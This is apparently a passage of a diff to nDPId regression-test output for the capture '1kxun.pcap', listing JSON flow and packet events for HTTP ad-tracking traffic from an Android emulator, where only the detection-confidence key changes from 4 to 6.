02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1315,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1315,"pkt_l4_len":1281,"thread_ts_msec":1654385229378,"pkt":"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"} 
-01924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"tknet-cdn.rayjump.com","url":"tknet-cdn.rayjump.com\/ad\/log\/play?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMefAEeGn3TfaiFfnRPGnEe6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIidMM6aSI6de0GkVBGahbfUi2f7NBfnQQ6a5tDAHti7HrWnt3inlwfaJ0DB2tGnvBWnR9inzUHUSUiUVeH%2BeIinvB6aRM6acIidMefAE1ibeIYbSQYrcML%2BeI6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb&type=reward_video&key=play_percentage&rate=0","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229378,"flow_last_seen":1654385229378,"flow_idle_time":7580000,"flow_min_l4_payload_len":1249,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1249,"flow_avg_l4_payload_len":1249,"midstream":1,"thread_ts_msec":1654385229378,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"tknet-cdn.rayjump.com","url":"tknet-cdn.rayjump.com\/ad\/log\/play?k=629bea20a4e5410001f01c7x&mp=fURPDr5tiUStf7V2fajMiaveHUveDAJ96aiPfU5IiARTfnHIGal9i%2BMefbMefAEeGn3TfaiFfnRPGnEe6jxc6aRAGaxIi%2BMPfdMei%2BewDke6Go9bWUxIi099WUR%2Fi%2BegYFKgY75IhFx8%2BFJML7K%2FH5K9GaHIinhPfdleialM6azIHkPIG%2BeIidMM6aSI6de0GkVBGahbfUi2f7NBfnQQ6a5tDAHti7HrWnt3inlwfaJ0DB2tGnvBWnR9inzUHUSUiUVeH%2BeIinvB6aRM6acIidMefAE1ibeIYbSQYrcML%2BeI6aSI4BzULoR1invMiajsRrxAh7Q3RUEFfZM0DFQ3RUE0inNAGaN2R0M0DkxwRUuYRrc1D%2BzsL%2BHQWrfXYZzJWoz0HoR1RrfXYZPt4rcBY7QFHZPtYrxBYFQ3R0M0hdzuDF56Lk90GUiBGZ9FGnRAWozMhrQUH5KXJ%2BN0GUiBGZ9FGnRAWozuh2KED0R1ioM0hdzuDF56hrcbRUEAiU3%2FfU3BiBM0J7c9RUEeWozrDkwQRUEeWoztJkfTLkK%2FRUEeWoztHQKTD%2Bl0GUiBGZ9FGnRAWozMhrQUH5KBH0R1iARPWUDPiUisRgSBLkfQ%2BbzrJoR1iARPWUDPiUisRgSBLkfQ%2BbzrJ7j0GUiBGZ9FGnRAWozrhdzuDFV0GUi%2FiU3FGnRAWoztJdQMHZR1iZM0L7D0GUvsRgfQD2KMhrQUHZR1iUVMWozUJ%2BzBHkPU4ZR1RQ5nxoRsRgzTDkh0Ggs0J7HsYbh0G0zrfZRsRgxEHk2uhBR1RrKTL75BhBzKWozADgxtHBR1R3RwHdfMW5xZRg2IideI6deI6dMb&type=reward_video&key=play_percentage&rate=0","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1654385229379,"pkt":"tKXvZygQnLbQ0+MzCABFAACkXu5AAEAGyJbAqAJ+I5wsDaZGAFB7fW9igsWKk4AYAfYTZgAAAQEIChlnEfwPV8RHbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiBkZTAxLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385229377,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":524,"midstream":1,"thread_ts_msec":1654385229379,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com"}} +00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385229377,"flow_last_seen":1654385229379,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":524,"midstream":1,"thread_ts_msec":1654385229379,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"de01.rayjump.com"}} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2513,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1654385229398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1654385229398,"pkt":"nLbQ0+MztKXvZygQCABFAADQ2J9AAPUGmbgjnCwNwKgCfgBQpjo7f\/DX8zWzN4AYAHOmEwAAAQEICg9XxGYZZxH5SFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47IGNoYXJzZXQ9dXRmLTgNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6Mjc6MDkgR01UDQpTZXJ2ZXI6IG5naW54DQpDb250ZW50LUxlbmd0aDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQox"} 00943{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":419,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":419,"pkt_l4_len":385,"thread_ts_msec":1654385229413,"pkt":"nLbQ0+MztKXvZygQCABFAAGVuYkAAPgG40ASQE8ywKgCfgBQo9QvB\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"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":490,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":490,"pkt_l4_len":456,"thread_ts_msec":1654385229450,"pkt":"tKXvZygQnLbQ0+MzCABFAAHcEFBAAEAG14XAqAJ+Eul7N9YaAFDjQWT+MbgksIAYAfZTFQAAAQEICs\/kGG+7dfu6R0VUIC9taW50ZWdyYWwvYmVhY29uP2FkX2dyb3VwX2lkPTE0Mzg0NSZjaGFubmVsX2lkPTExNyZjcmVhdGl2ZV9pZD0yNTM2NDAmYXVjdGlvbl9pZD1mODRmNTRiZi0zMWNkLTQzZmYtYmQyNy01MjZjY2M2NDU3ZGEmb3JpZ2luPWhhZ2dsZXItbWludGVncmFsMDIxIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGltcHJlc3Npb24tZWFzdC5saWZ0b2ZmLmlvDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"impression-east.liftoff.io","url":"impression-east.liftoff.io\/mintegral\/beacon?ad_group_id=143845&channel_id=117&creative_id=253640&auction_id=f84f54bf-31cd-43ff-bd27-526ccc6457da&origin=haggler-mintegral021","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; 
Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2517,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229450,"flow_last_seen":1654385229450,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385229450,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.233.123.55","src_port":54810,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"impression-east.liftoff.io","url":"impression-east.liftoff.io\/mintegral\/beacon?ad_group_id=143845&channel_id=117&creative_id=253640&auction_id=f84f54bf-31cd-43ff-bd27-526ccc6457da&origin=haggler-mintegral021","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":760,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":760,"pkt_l4_len":726,"thread_ts_msec":1654385229460,"pkt":"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\/cGxheWhlYWQ9W0NPTlRFTlRQTEFZSEVBRF0mc3I9MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiBhZGV4cC5saWZ0b2ZmLmlvDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01362{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"adexp.liftoff.io","url":"adexp.liftoff.io\/event\/vast\/start\/57aa80COXjCBIkZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhGICaqoiTMCB1KMi9DzCiEDobY29tLnNjZW5ld2F5Lmthbmthbi5tYXJrZXQzQhhoYXdrZXItcmVuZGVyaW5nLWNvbnRyb2xKCmQ4MTI5YmY1ZTRQAloDREVVYAJoBHIJdXMtZWFzdC0x4AEBgAF1kgECZW6YAQKhAQAAAAAAALA_qgEIMTI4MHg3MjCyAQ1FbnRlcnRhaW5tZW50ugEcUSBWaWRlby1Nb3ZpZXMgYW5kIFRWIHNlcmllc8IBGXZhc3QtNDI4MDVkMzNhNTBhNjIxZDE4NDPKAQEB0gEFMDQzMTfaAQV2aWRlbw?playhead=[CONTENTPLAYHEAD]&sr=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01362{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385229460,"flow_last_seen":1654385229460,"flow_idle_time":7580000,"flow_min_l4_payload_len":694,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":694,"midstream":1,"thread_ts_msec":1654385229460,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"adexp.liftoff.io","url":"adexp.liftoff.io\/event\/vast\/start\/57aa80COXjCBIkZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhGICaqoiTMCB1KMi9DzCiEDobY29tLnNjZW5ld2F5Lmthbmthbi5tYXJrZXQzQhhoYXdrZXItcmVuZGVyaW5nLWNvbnRyb2xKCmQ4MTI5YmY1ZTRQAloDREVVYAJoBHIJdXMtZWFzdC0x4AEBgAF1kgECZW6YAQKhAQAAAAAAALA_qgEIMTI4MHg3MjCyAQ1FbnRlcnRhaW5tZW50ugEcUSBWaWRlby1Nb3ZpZXMgYW5kIFRWIHNlcmllc8IBGXZhc3QtNDI4MDVkMzNhNTBhNjIxZDE4NDPKAQEB0gEFMDQzMTfaAQV2aWRlbw?playhead=[CONTENTPLAYHEAD]&sr=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, 
like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1654385229557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1654385229557,"pkt":"nLbQ0+MztKXvZygQCABFAAB\/zr9AAC0GLXMS6Xs3wKgCfgBQ1hoxuCSw40FmpoAYAecIEgAAAQEICrt1\/CbP5BhvSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI3OjA5IEdNVA0KQ29udGVudC1MZW5ndGg6IDANCg0K"} 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2523,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1654385229568,"pkt":"nLbQ0+MztKXvZygQCABFAADfGY1AAC4GkHES68wJwKgCfgBQnQxmD0SBkRmqKoAYAeR\/LQAAAQEICptIXBKljVtLSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGltYWdlL3BuZw0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNzowOSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA3MA0KDQqJUE5HDQoaCgAAAA1JSERSAAAAAQAAAAEIBgAAAB8VxIkAAAANSURBVHjaY2T4\/78eAAWEAn\/CWx4qAAAAAElFTkSuQmCC"} 
02394{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1654385231913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385231913,"pkt":"tKXvZygQnLbQ0+MzCABFAAXU7FhAAEAGNfzAqAJ+I5wsDaY6AFDzNbM3O3\/xc4AQAfUYlgAAAQEIChlnG+IPV8RmR0VUIC9jbGljaz9rPTYyOWJlYTIwYTRlNTQxMDAwMWYwMWM3eCZtcD1mVVJQRHI1dGlVU3RmN1YyZmFqTWlhdmVIVXZlREFKOTZhaVBmVTVJaUFSVGZuSElHYWw5aSUyQk1lZmJNZWZBRWVHbjNUZmFpRmZuUlBHbkVlNmp4YzZhUkFHYXhJaSUyQk1QZmRNZWklMkJld0RrZTZHbzliV1V4SWkwOTlXVVIlMkZpJTJCZWdZRktnWTc1SWhGeDglMkJGSk1MN0slMkZINUs5R2FISWluaFBmZGxlaWFsTTZheklIa1BJRyUyQmVJR25SJTJGaVVqUFdVTk1XVVJBZiUyQmVJaUI5ZWlVaiUyRmlVUlRXVWhBNmRlSURVUVFpVWxiZkFEQWZueDNpVVZQSCUyQk0yRGtpRkRuU3JIMFQ5SGFqOVduTmJEcml3RG4zTWkwVEJHYWpCREZETURBUjJpazVJNmFqTWlnTUJpZE1lNmFTSWluaDFHVWZJNjdLTUhrUHRoN1FJNjdjYmhGSDhMQXRBNmRzMEo3NXdoalEzUlV1T1JVM01mb1IxaSUyQjJLNmRzMERGbDBHVWpNaWF2ZVdvejNoYlN1SG9SMWZVVnNScmZ1SG9SMVJValRpQWxUZlpSc1JyYzNZWlIxa0J6dDRyY0JZN1FGSFpQVVlGVDAlMkJaTTBEck4wRzB6VVlGVCUyRkQlMkJ1dGhyZXVKclYlMkZEa1AzaHJLdUhvUnNSZ1NCTGtmUSUyQkZRJTJGUlVFQWlVMyUyRmZVM0JpQk0waGR6dURGNTZZYjVUUlVFQWlVMyUyRmZVM0JpQk0wTCUyQmY2TDdSMEdVdnNSZ1NCTGtmUSUyQmJ6dEpCUjFpQVJQV1VEUGlVaXNSZ3h0NG9SMWlaTTBIcmM4SFpSMWlaTTBEJTJCNVVKN1FYWTBSMWlaTTBEa0g2SjdjOVJVRUFpVTMlMkZmVTNCaUJNMGhkenVERjU2aHJEMEdVaUJHWjlGR25SQVdvek1oclFVSDVLQkhnTjBHVWlCR1o5RkduUkFXb3pNaHJRVUg1S0JIZ3h0UlVFQWlVMyUyRmZVM0JpQk0wSGdTQkxrZlFSVUVBV1VSUGZVM0JpQk0wRCUyQnhQaDdWMEdVanNScnRyUlVFTVdvekFIa2Y2aGR6dURGVjBHVVIyaW9NMERiNUJocjUlMkZEYjMwRzB6NVZUTjBXb3pCSjdjZ1JVdU9SZ3hyWTdLYlJVRTBIVVYwV296VEw3NXdMJTJCaTBHMHpYSjd0UWhnaTA2Wk0waEZ6VERraDBHMHpvV2t4QWhvMlZWMHpLNmFTSTZkZUk2ZGVPUnI1VUhkTjBHVWpBaWFSc1JyeEFoY0tVaHJRM1JVRWVmYVJGR25sTWlhMzlXb3pUREZ4VFJVRTA0Mk0wWSUyQkg2TGRRMEwlMkJ6MyUyQkZ4JTJGaDJNMEdVUnMlMkJvek1ZanglMkZoMk0wR1VjS1IwTTBKN3dVWTBSMWlvTTBKclEz
JTJCRkhVUlVFZVdvenRIZGZNRGtmUSUyQmJ4UGg3VjBHVXZzUnIydEo3NUJMa2NzJTJCYnhQaDdWMEdVdnNSclFGJTJCYnhNWWNLVFJVRU1Xb3pUaDd4VEpvUjFpb00wREZ4JTJGJTJCYngzRGt6VFJVRTBEbmowNiUyQk1iNmFSYmluUmU2YVNJNmRzMFlyNVRIQlIxUjB6SzZhUiUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBW"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01220{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1654385232006,"pkt":"tKXvZygQnLbQ0+MzCABFAAJjZ+1AAEAGUBrAqAJ+rNkQjtCoAFBWAxSGMjrpcIAYAfaC4wAAAQEICuWLG17z\/UGOR0VUIC9zdG9yZS9hcHBzL2RldGFpbHM\/aWQ9Y29tLmF6YXJsaXZlLmFuZHJvaWQmcmVmZXJyZXI9YWRqdXN0X2V4dGVybmFsX2NsaWNrX2lkJTNEdi4yX2cuMTQzODQ1X2EuZjg0ZjU0YmYtMzFjZC00M2ZmLWJkMjctNTI2Y2NjNjQ1N2RhX2MuMTE3X3QudWFfdS5lN2RmODcyNDdjYmNlYTEzJTI2dXRtX2NhbXBhaWduJTNEVGVzdCUyQkNhbXBhaWduJTI2dXRtX2NvbnRlbnQlM0RUZXN0JTJCU291cmNlJTJCQXBwXzEyMzQ1Njc4OSUyNnV0bV9zb3VyY2UlM0RMaWZ0b2ZmJTI2dXRtX3Rlcm0lM0RUZXN0JTJCQ3JlYXRpdmUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJ
LaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KSG9zdDogcGxheS5nb29nbGUuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2529,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232006,"flow_last_seen":1654385232006,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":559,"flow_tot_l4_payload_len":559,"flow_avg_l4_payload_len":559,"midstream":1,"thread_ts_msec":1654385232006,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": 